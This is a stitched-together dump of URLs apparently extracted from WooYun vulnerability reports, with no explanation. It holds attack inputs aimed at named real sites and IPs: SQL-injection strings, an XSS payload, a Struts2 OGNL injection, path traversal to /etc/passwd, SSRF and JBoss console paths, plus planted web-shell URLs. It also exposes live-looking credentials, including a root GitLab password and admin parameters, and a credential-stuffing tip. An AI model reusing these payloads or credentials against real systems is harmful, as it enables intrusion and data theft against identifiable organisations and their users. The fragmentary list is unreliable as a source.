http://bangong.aili.com http://www.wenji99.com 
http://www.wenji99.com/?m=shop&keys= http://www.wenji99.com/?m=shop&keys=%27 http://www.ciscostation.com.cn/productview.jsp?ID=13 http://**.**.**.**:8080/SearchSupervision.aspx http://www.chinaticket.com/my/orderdetail/184074.html http://www.chinaticket.com/faq/44.html http://game.feng.com/gamenew/fengComment/getCommentListSecond.shtml http://www.njcb.com.cn/jsearch/setup/opr_licenceinfo.jsp http://www.njcb.com.cn/jsearch/VerifyCodeServlet?var=cookie_username http://www.njcb.com.cn/jsearch/setup/opr_licenceinfo.jsp http://dev.koyimall.com/board/bbs_view.html?bbs_code=notice&category_code=&cpage=1&seq=16250 http://www.angelvestgroup.com/cn/about.php?id=1 http://www.angelvestgroup.com/cn/about.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.angelvestgroup.com/info.php?id=1 http://www.ciscostation.com.cn/mall/mallmerchandise.jsp?gid=377 http://b2b.crphenan.com:9666/b2b/firstpage/firstpage_init.action http://b2b.crphenan.com:9666/b2b/product/do_getImageData.action http://**.**.**.**/bugs/wooyun-2010-0116363 http://**.**.**.**/bugs/wooyun-2015-0137759/trace/0217d61dc7d852a384cc231f4bb8775a http://**.**.**.**/bugs/wooyun-2015-0137760/trace/5dd55d78df354fc3b1387d3bdbc2b596 http://**.**.**.**/select_pro.aspx?type=productname&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_job.aspx?type=jobname&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_jianli.aspx?type=workto&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/ExhibitionCenter.aspx?type=hzmc&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/ExhibitionCenter.aspx?area=asd1%27/**/and/**/1=@@version--%20- http://**.**.**.**/viewmulu.aspx?qi_id=0&preqi_id=@@version&mid=23292&xuhao=56 http://**.**.**.**/SupplyList.aspx?parentid=0&classid=@@version 
http://**.**.**.**/select_news.aspx?type=1&content=asd1%27/**/and/**/1=@@version/**/and/**/%27%%27=%27 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**:6677/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 http://**.**.**.**/select_e.aspx?type=gjz&content=-1 www.chinaticket.com/my/address/edit.html?id=*** www.chinaticket.com www.chinaticket.com/my/do/address.do?act=del&id=*** www.chinaticket.com/my/address/edit.html?id=*** www.chinaticket.com/my/do/address.do?act=del&id=***,id改为其他人的地址即可删除成功,再查看时已不存在: url:http://**.**.**.**/default.aspx http://sns.midea.com http://idea.midea.com http://219.134.188.38:81/DCS_UAT/ http://enter.koyimall.com:80/ http://**.**.**.**/?a=web.article&uid=8890&id=12300&act=youerzaojiao&navid=2 http://**.**.**.**/?a=web.articles&uid=8889&id=406 http://**.**.**.**/?a=web.articles&uid=9052&id=3719 http://**.**.**.**/?a=web.articles&uid=9028&id=3538 http://**.**.**.**/?a=web.article&uid=8947&id=4940 
http://**.**.**.**/?a=web.articles&uid=8898&id=112 http://**.**.**.**/?a=web.articles&uid=8923&id=687 http://**.**.**.**/?a=web.articles&uid=8927&id=762 http://**.**.**.**/?a=web.articles&uid=9034&id=3409 http://**.**.**.**/clf/system/login_admin.aspx www.chinaticket.com http://cms.1jiajie.com http://open.iciba.com/ds_open.php?id=2156&name=wpfAppliaction1&auth=D3A737B1579CB2AAA926365FAC9B32E6 http://csc.zte.com.cn/csc/helpdesk.aspx?eccLanguage=English&logon=first&fromStr=eccindex&systemName=ECC1&employeeNum=10057782 http://csc.zte.com.cn/callcenter/mobilenote.htm http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/btin_cms/cnt/moreCount.do http://wx.chuchujie.com/sqe?s=Order&a=get_order_list&vcode=88350dd4b55726&ctime_start=2015-09-09&ctime_end=2015-09-11&status=1 http://125.32.26.18/Notice.aspx?id=7 http://125.32.26.18/Notice.aspx?id=4 http://ssqj.qiye.ikanshu.cn/ http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a* http://ms.hinews.cn/bl_pl_save.php http://mobile.jianlc.com/app/profile/sendInvestContract.shtml http://www.ciscostation.com.cn/mall/jdclassify.jsp?cxtype=jd&jftype=wx http://inc.form.xiaoma.com/ http://www.ciscostation.com.cn/mall/mallhddise.jsp?gid=411 http://www.e-bridge.com.cn:80/ www.e-bridge.com.cn http://zn.baidu.com/kgs/result?q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E www.ganji.com http://el.cninsure.net/SumTotal/login.htm http://**.**.**.**/DQ/Publicity/ExmYdGvDetail.asp?dGovernID=A01 http://**.**.**.** http://gjb4.95081.com/login.jsp,管家宝,此处可进行撞库,用拼音字母和弱口令123456可获得20多个账号,登陆后可查看订单管理、客户管理、员工管理等等敏感信息,可获知超过4万名家政人员的姓名、电话和身份证照。 www.winona.cn http://www.winona.cn/article-weishijie-l-21.html http://www.winona.cn/shopadmin/index.php http://**.**.**.**/site_item_content_2.php?site_map_item_id=361 www.koyimall.com http://drops.wooyun.org/papers/7830 URL:http://bbs.cy.com/ http://admin.iyishengyuan.com/ http://**.**.**.**/web/DwDetail.aspx?bh=CJGLJCDD http://www.uhuibao.com 
http://clm.njau.edu.cn/book/BookList.aspx?ckey=C156 http://**.**.**.**/bugs/wooyun-2010-0101950 http://**.**.**.**/site_item_list_4.php?site_map_item_id=139 http://**.**.**.**/huide_hosp/big5/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://**.**.**.**/event_photo_detail_list.php?event_id=1 http://222.168.22.57:7001/mmis2 http://222.168.22.57:7001/aes/ http://222.168.22.57:7001/shortcutPays/ http://222.168.22.57:7001/console/login/LoginForm.jsp http://222.168.22.57:7001/ma/ma3.jsp http://szhxy.guet.edu.cn/qxgl/public/RegArm.aspx?userid=a http://rss.aili.com/index.php?cid=1&coludir=celeb http://e.changyan.sohu.com/ http://222.188.208.51:7003/mspf/1/login.do http://222.188.208.51:7003/JSMSServer/login.jsp http://222.188.208.51:7003/BanKloudServer/ http://222.188.208.51:7003/console/login/LoginForm.jsp http://222.188.208.51:7003/ma/ma3.jsp jdbc:oracle:thin:@172.16.100.25:1521:mspf http://**.**.**.**/ http://**.**.**.**/gjjview.asp(住房公积金缴存余额查询) http://**.**.**.**/dkview.asp(住房公积金贷款余额查询) http://**.**.**.**/active/news/flash/swf.asp?id=49 http://**.**.**.**/ http://zmifi.com/ http://zmifi.com/zmifi.rar http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=11001 http://**.**.**.**/provider/entertainment/yuleDetail.do?pdno=1111 http://oa.cashchina.cn:8080/portal/pages/index.jsp www.s.com www.sh.com ip:192.168.1.28 ip:192.168.1.28 http://blog.social-touch.com/ http://blog.social-touch.com/wp-content.tar.gz http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ninghe/search.jsp 
http://ybmis.fj.sgcc.com.cn/ http://higo.meilishuo.com/hgweixin/index.php?r=wish/detail&id=1 https://passport.coocaa.com/html2/login.html http://jl.sanhao.com/ http://jl.sanhao.com/admin/login.php http://jl.sanhao.com/admin/upload.php URL:http://**.**.**.** http://1jiajie.com/login.html http://**.**.**.**/gf/wnwb**.**.**.**.exe file:///C:/Windows/System32浏览系统目录,并下载cmd.exe; http://servexpress.digitalchina.com/ http://xmbc.xiaoma.com/users/153 http://xmbc.xiaoma.com/users/151 http://xmbc.xiaoma.com/users/152 http://xmbc.xiaoma.com/users/150 http://5sing.kugou.com/m/login.html http://wap.ccqtcc.com/ http://wap.ccqtcc.com/adminzxc/index.asp http://xyb.cupl.edu.cn/Alumni_donate.aspx?stype=42 http://www.econ.sdu.edu.cn/bkjx/list_all.php?sortid=117 http://m.sanhao.com/log.txt http://its.zte.com.cn/SSO/ http://**.**.**.**/cmd.php http://**.**.**.**/cmd.php?cmd=ls http://www.yikuaiqu.com/ http://maijia.zol.com/ http://maijia.zol.com/index.php?c=GoodsManagerAddGoods&productStatus=0&subId=851&manuId=40685&keyWords=sql http://cms82.vojs.cn/source/zcr_zan.php?gid= http://sqlmap.org http://**.**.**.**/index.php?a=lists&m=index&id=1 http://biz.cli.im/vcardview/*****形式。*处为五位字幕数字的组合。这么短的编号很容易使用穷举的方法遍历,能够不经过用户同意就获取到用户名片信息。 http://yezhu.qingdaonews.com/threadcount.php?fid=656 http://sqlmap.org http://mailserver.juneyao.com/ http://192.168.34.105/wechat/ http://192.168.0.181/ http://shop.1mxian.com/ http://shop.1mxian.com/orders/totalBeforeWaiting http://**.**.**.**/index.php?area=wlmq http://weixin.union.appchina.com/ http://its.zte.com.cn/univ/login.aspx http://www.zufangzi.com/ http://www.itl.cn/news_edit.jsp http://www.job168.com/dxc/infor/detail.jsp?info_no=5581 http://www.dcleasing.com.cn/ http://www.dcleasing.com.cn/news/class/index.php?author=&catid=1%27%22&key=&myord=dtime&myshownums=&page=3&showdate=&showtj= http://**.**.**.**/invoker/JMXInvokerServlet http://zhuanti.inewsweek.cn/list.php?catalog_id=237 http://sqlmap.org http://its.dcpc.com/w8/pages/default/index-m.aspx 
http://enter.koyimall.com/?bid=koyimall&c=1/9&cat=&iframe=&keyword=1&m=bbs&orderby=asc&r=home&recnum=20&skin=&sort=gid&type=&where=name http://**.**.**.**/FCKeditor/editor/fckeditor.html http://**.**.**.**/info_Print.asp?ArticleID=292 http://www.cunloan.com/ http://wapsd.189.cn/self/self/busipack/gettp4g.do?typeId=105 http://211.151.249.76 http://211.151.249.76/jianli http://**.**.**.**/Login.aspx http://203.91.46.81:8010/global/Account/login http://licai.shangdu.com/ http://licai.shangdu.com/licai.zip http://kaoshi.corp.ganji.com http://kaoshi.corp.ganji.com http://hr.acmcoder.com/ http://**.**.**.**/online_join.asp?cid=1 http://m.1jiajie.com/.git/config root:ejiajieadmin123 http://root:ejiajieadmin123@gitlab.1jiajie.com/user/ejj-user-mobile-web.git http://baqi.etuan.com/ http://**.**.**.**:9080/wscgs/yymap.do?dwlb=01&type=load,dwlb参数存在注入点。 http://**.**.**.**/bch/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx http://www.sanhao.com/ http://dl.sz.baidu.com/ime/setup/BaiduPinyinSetup_TN_3.1.2.376_1.exe file:///C:/Windows/System32浏览系统目录,并下载cmd.exe; http://cpip.dfl.com.cn/yclcgdd/YCLCGDDetail.aspx?ID=7777 http://cn.cvte.com/.wp-config.php.swp http://**.**.**.**/dict_query.aspx http://**.**.**.**/fmetadatalist.aspx?bh=750 http://**.**.**.**//simpsearch.aspx http://**.**.**.**/fmetadatalist.aspx?bh=750 http://jz.etuan.com:80/ http://219.143.230.163/uddiexplorer/SearchPublicRegistries.jsp http://219.143.230.186/uddiexplorer/SearchPublicRegistries.jsp http://114.251.229.213/uddiexplorer/SearchPublicRegistries.jsp http://219.143.230.136/uddiexplorer/SearchPublicRegistries.jsp http://sc.12321.cn:80/welcome.do?optype=forwardto&img=0 http://www.newsmyshop.com com:3306 http://xyxy.immomogame.com/index.php http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-097838 http://**.**.**.**/ http://omstest.vmall.com http://www.zhulong.com.cn:84/zentao/user-login-L3plbnRhby8=.html 
http://**.**.**.**/index.php?lang=zh-gb2312&server=1 http://www.de175.com/admin/login/login.php http://wooyun.org/bugs/wooyun-2015-0130301 http://gongyi.homelink.com.cn/lianjia/portal/index http://gongyi.homelink.com.cn/lianjia/portal/user/personalCenterUpdate http://**.**.**.**:8080/QuJi/SanJi/Qzb_Print_Note.aspx?eventid=001501240310 http://221.8.57.106:7002/console http://221.8.57.106:7003/console http://221.8.57.106/console http://221.8.57.106:7002/mses/ http://221.8.57.106:7002/gps/LoginServlet http://221.8.57.106:7002/dsp http://221.8.57.106:7003/mabis/ http://221.8.57.106/wxpt/ mx://res/error/danger_site.htm特权域时发现有对URL的处理: http://backoffice.111.com.cn/ http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30004 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=30004 http://www.orchidasia.com/fckeditor/editor/filemanager/browser/default/browser.html?%20Type=../&Connector=connectors/aspx/connector.aspx页面可以直接上传.aspx和.asp文件 www.orchidasia.com http://www.orchidasia.com http://**.**.**.**/News/ContentPage.aspx?category=N001&newsid=635398294777364362 http://wooyun.org/bugs/wooyun-2015-0130299 http://182.92.234.7/Admin/user/Login http://webcasqa2.byd.com.cn/sso/member.php?mod=register http://webcasqa2.byd.com.cn/sso/member.php?mod=lostpasswd http://club.hydron.com.cn/ http://xue.huaji.com/florist.php?type=5 http://**.**.**.**/indexAction.action http://**.**.**.**/hrm/resource/HrmResource.jsp?id=2000 http://xd.mediav.com/s?type=8&r=7&impid=OjIAOoBlspo=&cid=53265194&size=610x100 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/jcpu/ http://**.**.**.**/ http://**.**.**.**/cjcmmte/ http://**.**.**.**/jrs/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/kcdz/ http://**.**.**.**/dzyktcn/ http://**.**.**.**/ http://**.**.**.**/ch/reader/inner_key_query_list.aspx http://**.**.**.**/ch/reader/inner_luxury_advance_query_article_list.aspx 
http://**.**.**.**/ch/reader/luxury_advance_query_article_list.aspx http://**.**.**.**/ch/reader/new_advance_query.aspx http://**.**.**.**/ch/reader/query_recent_article_list.aspx http://**.**.**.**/ch/reader/resci_recent_article.aspx http://**.**.**.**/ch/reader/wait_published_articles.aspx http://**.**.**.**/ch/dbmanager/table_manager.aspx http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001 http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001 E7-Planning.war/WEB-INF/classes/dataSource.properties jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://117.40.240.192:7001/cms2 http://117.40.240.192:7001/console/ http://117.40.240.192:7001/ma/ma3.jsp http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/cms http://**.**.**.**/Admin_Login.aspx http://**.**.**.**/ http://wap.anwmce.com/register.ASP?id=1 http://wap.anwmce.com/adminzxc/mylist.asp http://wap.anwmce.com/adminzxc/index.asp http://www.chinacoldchain.com/bgapp/Index.htm http://**.**.**.**:8100/ksbm/index.php http://**.**.**.**:8100/info/2015%E8%8B%8F%E5%B7%9E%E5%B8%82%E5%85%AC%E5%8A%A1%E5%91%98%E9%80%89%E8%B0%83/%E5%B8%90%E5%8F%B7%E5%AF%86%E7%A0%81.txt http://house.gzmama.com/index.php?a=index&g=Loupan&m=Search&saleid=46&sitetag=123 http://**.**.**.**/cysz.php?id=242 http://meiqia.com/password/find http://www.17ugo.com/searchd.php?act=comment&goods_id= http://mobile.letao.com/wap/app_download.aspx?bid=12&op=brand http://**.**.**.**/为例 http://**.**.**.**/Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FApp_Data%2FHsort.mdb http://**.**.**.**/Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FWeb.config 
http://221.237.153.42:10002/Forms/Log.aspx http://big5.bankcomm.com http://big5.bankcomm.com/gate/big5/www.bankcomm.com.zhihuijinan.cc/css/player.swf?csdn.net?/doms_web_syste/X758#5173.com/detail/JS227-20150913.shtml http://bizinfo.airkunming.com/ http://bizinfo.airkunming.com/%C0%AE/WEB-INF/web.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/struts-config.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/example/struts-config-example.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/system/struts-config-system.xml http://bizinfo.airkunming.com/module/system/hrsearchepositionList.jsp http://bizinfo.airkunming.com/module/b2c/message/msgList.jsp http://bizinfo.airkunming.com/module/b2c/member/userList.jsp http://bizinfo.airkunming.com/module/info/info_website.jsp http://wd.fync.edu.cn http://wd.fync.edu.cn/webfile.aspx http://**.**.**.**/ApplicationSearch.aspx?type=1 http://**.**.**.**/XingZhengQuanLi.php?TableId=1&ChannelId=4 http://**.**.**.**:7500/Login/Index http://www.skyworthlcd.com/zh-cn/Product.aspx?s=a%27%27 URL:http://**.**.**.**/cgsite.pr.prCgImgDetail.do?imgId=250821 http://**.**.**.**/index.php?m=instarea&c=infund&inst_code=80000220 http://mall.srcb.com/customer/member/memberedit.jhtml http://**.**.**.**/nuclear/upload/123.jsp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/list.aspx?id=363110810873 http://www.goldmail.cn/learning/news_detail.php?ID=76 http://**.**.**.**:8080/invoker/JMXInvokerServlet http://2010partner.digitalchina.com/1.rar http://wooyun.org/bugs/wooyun-2010-024841成功getshell http://2010partner.digitalchina.com/system_dntb/upload/zphzph.aspx http://**.**.**.**/zh-cn/read.jsp?id=1, http://www.goldmail.cn/service/list.php?NewsType=syjq www.dufe.edu.cn/24 
http://mail.ymt360.com/ http://www.vcanbio.com//Investor_AnnalsDetail.aspx?id=18 http://www.yinongdai.com/comehere/inviteFriends http://v.xiaoma.com/dt/columns/anran*/list_1516_1.html http://**.**.**.**/website/webnewsshow.aspx?tid=2321 http://**.**.**.**/website/ http://www.chinazyjr.com/Index/show/id/208*/c_id/ http://www.wy-fund.com/index.php?m=instarea&c=inbrok&a=init&inst_id=55 www.wy-fund.com/index.php?m=instarea&c=infund&inst_code=80000220 http://micro.wy-fund.com http://finance.letv.com/ http://micro.wy-fund.com/?leshi/home.info/270025抓包有两处注入的地方,分别为下面的注入1和注入3了!~~~ http://micro.wy-fund.com/?leshi/home.info/270025 http://leshi.wy-fund.com/ http://www.easy-u.com.cn http://www.easy-u.com.cn/uploadfile/php20150708.php.php.php.php.php.php.php.php.php.php.php.rar host:172.28.202.243 http://**.**.**.**/Login/loginpageforstudentb.aspx http://**.**.**.**/Login/loginpageforuserb.as http://**.**.**.**/bugs/wooyun-2014-059180 http://ele.98ep.com/ http://ele.98ep.com/Manager/Module/SystemBasis/OpinionManage/Upload/Temp/文件名 http://ele.98ep.com/Manager/Module/SystemBasis/OpinionManage/Upload/Temp/%E9%AB%98%E7%AB%AF%E9%A4%90%E9%A5%AE%E9%83%A8%E9%99%A4%E5%8C%97%E4%B8%8A1442166916.txt http://www.jyeoo.com/account/sendpassword http://tool.chacuo.net/mailanonymous http://tp.nanshan.com.cn:8011/Images.aspx?id=3 http://order.th010.com/.svn/entries http://**.**.**.**/Newspaper/Show.aspx?id=175207 http://**.**.**.**:80/information/infor.htm?firstTF=1&Kinds=17&searchName=人物&ResourceId=1 1.jf.ztgame.com/huodong.php http://jf.ztgame.com/admin/login.html http://www.crfchina.com http://www.crfchina.com/retrievePasswordResetSuccess.do www.crfchina.com http://admin.ixingmei.com/ http://**.**.**.**/rentlist.asp?isgood=2 http://**.**.**.**/jianzhi_View.asp?jianzhiid=1098 http://crm.xiaoma.com/ http://app.xiaoma.com/ http://**.**.**.**/article.php?CID=5&ID=95 
http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://office.galaxyasset.com/tools/SWFUpload/upload.jsp www.jpush.cn http://ices.hit.edu.cn:8080/mailList!toMain.action http://5sing.kugou.com/zc/login这个登陆接口是酷狗旗下5sing的登陆接口,登陆位置没有做出任何限制 http://**.**.**/console/_ http://**.**.**/mobilePolicy/login.jsp http://61.158.140.6/colorring/manager/enter.jsp http://www.ordosbank.com/message.jsf?msgId=325 http://club.bydauto.com.cn/portal.php http://webcasqa2.byd.com.cn/sso/member.php?mod=lostpasswd http://jf.ztgame.com/seckill.php http://jf.ztgame.com/oauth/notify_url.php http://jf.ztgame.com/mypoint.php http://jf.ztgame.com/mycar.php http://jf.ztgame.com/lottery.php http://jf.ztgame.com/huodong.php http://jf.ztgame.com/heartbeat.php http://jf.ztgame.com/do_receive_jifen.php http://jf.ztgame.com/admin/login.php http://jf.ztgame.com/detail.php http://jf.ztgame.com/do_buy.php http://yimin.edai.com/immigrate.php http://yimin.edai.com/manager/cx/immigrate.php?act=list&table=immigrate http://yimin.edai.com/manager/cx/index.php http://219.140.166.16/marriage/test1.jsp进去一看,各种爆破也不行 http://219.140.166.16/marriage/xunyi.jsp http://219.140.166.16/marriage/test1.jsp jdbc:oracle:thin:@10.68.0.62:1521:marreg http://servexpress.digitalchina.com/sms/DellMobile/login.asp http://**.**.**.**/public/6line/6line_gbook/河北电视台留言本处可以xss http://s1.hlzj.kugou.com/Account/Login http://mis.iciba.com/index.php?action=login http://www.qhdhr.com.cn:8081/ http://www.qhdhr.com.cn:8081/hr_cardshow/ http://ifs.swufe.edu.cn/index.php?go=product-102.html http://oa.pbwear.com:8080/page/maint/login/Page.jsp?templateId=12&logintype=2 http://gossip.renren.com/gossip.do http://www.izuche.com/EmployDetail.aspx?key=3 http://www.hxci.com.cn/library/漏洞目录 http://www.hxci.com.cn/library/data/mysqli_error_trace.inc http://**.**.**.**/bugs/wooyun-2010-0115868 http://**.**.**.**/ 
http://**.**.**.**:8080 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://mail.cp6cc.com.cn http://mis.iciba.com/index.php http://220.248.229.53:7001/cas/login http://**.**.**.**/v_show/id_XMTMzMTc0ODA5Ng==.html http://www.renren.com/privacyhome.do http://www.renren.com/profile/privacy/saveOther http://app.ichina.cn http://app.ichina.cn/index.php?app=findpwd&act=resetpwd&uid=bb72f7e31a0542f5adc4a537318e72c6120852 http://app.ichina.cn/index.php?app=findpwd&act=resetpwd&uid=559bc4f91463c9b1616f3b6a7470ac2d1 http://api.healthmall.tv/app/Userservices/help http://api.healthmall.tv/Handlers/ http://119.29.94.72:9909/SyatemManagement/NewLogin.aspx http://58.48.178.98:9090/seeyon/main.do?method=index http://office.galaxyasset.com/page/maint/login/Page.jsp?templateId=18 http://wpi.renren.com/muc_chat http://cs.xyzq.com.cn:9999/index.xhtml http://photo.renren.com/photo/zuji/859601814/addZuji http://lab.njnu.edu.cn/huaxue/default.asp http://lab.njnu.edu.cn/checkuser.asp http://sqlmap.org http://**.**.**.**/static/homepage/subjectpage/57400000163611.html http://www.doctorcom.com/robots.txt http://**.**.**.**/exam/?action=DataList&ClassID=2483 http://daimayi.com/index.php/Counselor/index/cr_id/10 http://**.**.**.**/negp/pages/Login/index.do http://**.**.**.**/admin_edit.asp?ID=37115&un=ztdj&pw=habc1010&XX=%D4%DA%CF%DF%CD%B6%B8%E5&whichpage=1&xq=%C7%C9%BC%D2 open.haodai.com/credit/index/xd_type/credit.html?bank_id=3&bank_id_show=%e4%ba%a4%e9%80%9a%e9%93%b6%e8%a1%8c&tag_ids=111&tag_ids_show=%e5%95%86%e6%97%85%e8%81%94%e5%90%8d http://80h.liwai.com/content.php?id=4049 http://art.liwai.com http://decorate.liwai.com http://gardens.liwai.com http://oa.superjia.com/messager/users.data http://www.ichunt.com/brand_detail.php?id=101 CanF:sqlmap http://www.ichunt.com/brand_detail.php?id=101 http://sqlmap.sourceforge.net www.ichunt.com/session https://124.192.206.253/Account?forward=https%3A%2F%2F124.192.206.253%2F 
http://**.**.**.**/Member/Customer_List.aspx http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://www.**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp http://**.**.**.**/manage/index.asp https://plmyun.joyoung.com/ease/App/index.php/Public/login http://58.251.152.247:8010 http://**.**.**.**/wechat/unicomRed/common/loginOut http://**.**.**.**/ajax/mail.asp?mail= http://mail.cdzq.com/ http://**.**.**.**:8052/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= https://42.121.52.97/pay/news.php?id=646 https://42.121.52.97/pay/news.php?id=646 https://42.121.52.97/pay/news.php?id=-1 https://42.121.52.97/pay/news.php?id=-1 http://112.90.224.187/backup/configs.7z https://github.com/CodeBeginner/config_files/blob/a0c923ed07227fe71b0895772bb1af80a3692df5/滴滴个人信息.txt http://nx.gtja.com/web.rar http://zzjnet.blog.51cto.com/323001/318778 https://42.121.52.97/sec.php https://42.121.52.97/ttt.php http://60.10.8.227:88 http://60.10.8.227:88/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/info_pagelist.jsp?&page=&xwid=54355&lmmc=dd_jtyw http://**.**.**.**/wzht/loginAction.do http://**.**.**.**/wzht/y.jsp,发现是内网ip,没有加入任何域,可以上外网。 http://**.**.**.**/wzht/ http://**.**.**.** http://**.**.**.**/wzht/UpLoad/Pic/tunnel.jsp http://**.**.**.**30/license!getExpireDateOfDays.action http://**.**.**.**/login.jsp http://**.**.**.**/ http://www.fengniao.com/active/20100712_hutong/iframe_list.php?cid=3 http://www.huaweimossel.com/ http://www.huaweimossel.com/gallery-ajax_get_goods.html http://**.**.**.**/这个界面抓包 http://www.htsc.com.cn http://61.132.51.129:8001/manage/admin/index.jsp http://**.**.**.**/chaxun_geren.asp http://daimayi.com/index.php/Ask/index/type/2 
http://online.omegatravel.net/flight_dynamic.aspx?FlyToIata=BKK http://124.232.143.110/ http://124.232.143.110/login_login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://**.**.**.**:8000/hbgyjj/NewsDetail.aspx?title=%D7%A8%CC%E2%D0%C5%CF%A2&ID=2014-05-07%2009:03:48 http://**.**.**.**:8000/hbgyjj/SearchNews.aspx?keyword=123 http://**.**.**.**:8000//hbgyjj/fckeditor/editor/ http://**.**.**.**:8000/hbgyjj/image/ http://**.**.**.**:8000/hbgyjj/style/css2.css http://www.freescaleic.org/ http://analog.eefocus.com/ http://ams.eefocus.com/ http://rf.eefocus.com/ http://linear.eefocus.com/ http://mcu.eefocus.com/ http://www.stmcu.org/ http://tm.eefocus.com/ http://**.**.**.**:20022/i-card/ jdbc:oracle:thin:@**.**.**.**:1521/AMACHN jdbc:oracle:thin:@**.**.**.**:1521:ORCL jdbc:sqlserver://**.**.**.**:1433 http://**.**.**.**/download?fileName=..%2f..%2f..%2f..%2fetc%2fpasswd http://www.e-picc.com.cn/ecargo/ http://**.**.**.**/uploadimages/lpt6.201559181941.asa http://**.**.**.**/web-console/ http://**.**.**.**/invoker/JMXInvokerServlet http://jiangmen.jjshome.com/login.php3?reason=chpass2 http://k.ganji.com/password?returnUrl=%2Fuc http://219.141.171.219/login.jsp http://**.**.**.**/gps/doif/myLogin.jsp http://103.2xx.xxx.xx6:1xxx0/ http://jl.sanhao.com/,逻辑问题不少 http://**.**.**.**/youyuan/winlist.jsp?awardid=370 http://**.**.**.**/kai1_detail.asp?id=202 http://**.**.**.**/p_topic.asp?id=5 